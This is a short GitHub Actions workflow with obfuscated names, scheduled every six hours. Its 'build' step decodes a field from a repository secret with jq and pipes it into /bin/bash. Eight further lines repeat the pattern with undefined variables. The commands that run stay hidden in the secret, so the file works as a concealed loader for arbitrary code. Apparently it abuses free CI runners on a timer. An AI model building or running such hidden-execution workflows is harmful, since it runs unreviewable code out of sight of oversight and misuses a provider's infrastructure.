name: chupanbian4381

on:
  workflow_dispatch:
  schedule:
    - cron: '5 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: chupanbian4381
        env:
          u5948: ${{ secrets.u5948 }}
        run: |
          echo $u5948 | jq -r .e14526 | /bin/bash
          echo $yvxzp81 | jq -r .dyzwm03 | /bin/bash
          echo $mvwde7 | jq -r .raiun9245 | /bin/bash
          echo $uthx0 | jq -r .ztyjp3 | /bin/bash
          echo $nrx29 | jq -r .cjx64 | /bin/bash
          echo $tnew8741 | jq -r .mlmfz95871 | /bin/bash
          echo $fv6 | jq -r .ogjg0124 | /bin/bash
          echo $jbokr11 | jq -r .ijrhb1480 | /bin/bash
          echo $fbswp938 | jq -r .kihst6 | /bin/bash

